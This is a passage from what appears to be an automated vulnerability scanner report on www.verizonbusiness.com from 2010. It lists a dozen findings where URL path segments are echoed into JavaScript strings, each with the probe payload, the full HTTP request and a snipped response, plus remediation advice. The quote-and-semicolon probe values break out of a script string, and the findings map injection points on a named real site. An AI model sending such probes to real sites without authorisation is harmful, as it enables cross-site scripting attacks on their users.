This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itba539"%3bf452eb4f7f1/data-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:40:19 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42311
Date: Wed, 17 Nov 2010 00:40:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/itba539";f452eb4f7f1/data-center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.119. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/data-center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3d5c2'%3b07e07d54884 was submitted in the REST URL parameter 3. This input was echoed as 3d5c2';07e07d54884 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/data-center3d5c2'%3b07e07d54884/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43037
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/data-center3d5c2';07e07d54884/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.120. http://www.verizonbusiness.com/Products/it/data-center/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/data-center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70725"%3ba036c8c8520 was submitted in the REST URL parameter 3. This input was echoed as 70725";a036c8c8520 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/data-center70725"%3ba036c8c8520/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43039
Date: Wed, 17 Nov 2010 00:40:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/data-center70725";a036c8c8520/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.121. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc6c9"%3b353a9d1eb2b was submitted in the REST URL parameter 1. This input was echoed as bc6c9";353a9d1eb2b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsbc6c9"%3b353a9d1eb2b/it/managed-apps/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:47 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:47 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:47 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsbc6c9";353a9d1eb2b/it/managed-apps/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENT
...[SNIP]...

1.122. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 161dc'%3beb37a86364e was submitted in the REST URL parameter 1. This input was echoed as 161dc';eb37a86364e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products161dc'%3beb37a86364e/it/managed-apps/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:40:18 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40648
Date: Wed, 17 Nov 2010 00:40:18 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:18 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products161dc';eb37a86364e/it/managed-apps/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.123. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a514'%3b26e8b3c91fb was submitted in the REST URL parameter 2. This input was echoed as 6a514';26e8b3c91fb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it6a514'%3b26e8b3c91fb/managed-apps/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42313
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/it6a514';26e8b3c91fb/managed-apps/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.124. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72c10"%3bcc7d5206c0b was submitted in the REST URL parameter 2. This input was echoed as 72c10";cc7d5206c0b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it72c10"%3bcc7d5206c0b/managed-apps/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:36 GMT
Content-Type: text/html
Content-Length: 42315
Date: Wed, 17 Nov 2010 00:40:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it72c10";cc7d5206c0b/managed-apps/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.125. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a3a1"%3bf6e6f98e7f6 was submitted in the REST URL parameter 3. This input was echoed as 1a3a1";f6e6f98e7f6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps1a3a1"%3bf6e6f98e7f6/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:55 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 43039
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:55 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/it/managed-apps1a3a1";f6e6f98e7f6/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.126. http://www.verizonbusiness.com/Products/it/managed-apps/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e31c'%3b993aaf8a816 was submitted in the REST URL parameter 3. This input was echoed as 6e31c';993aaf8a816 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/it/managed-apps6e31c'%3b993aaf8a816/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:41:00 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 43039
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:41:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:41:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/it/managed-apps6e31c';993aaf8a816/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.127. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adf1e"%3bd9c8c1a9735 was submitted in the REST URL parameter 1. This input was echoed as adf1e";d9c8c1a9735 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsadf1e"%3bd9c8c1a9735/it/managed-apps/app-mgmt/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Productsadf1e";d9c8c1a9735/it/managed-apps/app-mgmt/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.128. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2a16'%3beba3fdc32e6 was submitted in the REST URL parameter 1. This input was echoed as d2a16';eba3fdc32e6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsd2a16'%3beba3fdc32e6/it/managed-apps/app-mgmt/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productsd2a16';eba3fdc32e6/it/managed-apps/app-mgmt/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.129. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd659'%3b0e2940ada39 was submitted in the REST URL parameter 2. This input was echoed as cd659';0e2940ada39 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itcd659'%3b0e2940ada39/managed-apps/app-mgmt/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:40:38 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 42331
Date: Wed, 17 Nov 2010 00:40:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/itcd659';0e2940ada39/managed-apps/app-mgmt/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.130. http://www.verizonbusiness.com/Products/it/managed-apps/app-mgmt/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/it/managed-apps/app-mgmt/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1aac"%3be8b940f9cf5 was submitted in the REST URL parameter 2. This input was echoed as d1aac";e8b940f9cf5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/itd1aac"%3be8b940f9cf5/managed-apps/app-mgmt/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:40:25 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42331
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:40:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:40:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/itd1aac";e8b940f9cf5/managed-apps/app-mgmt/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
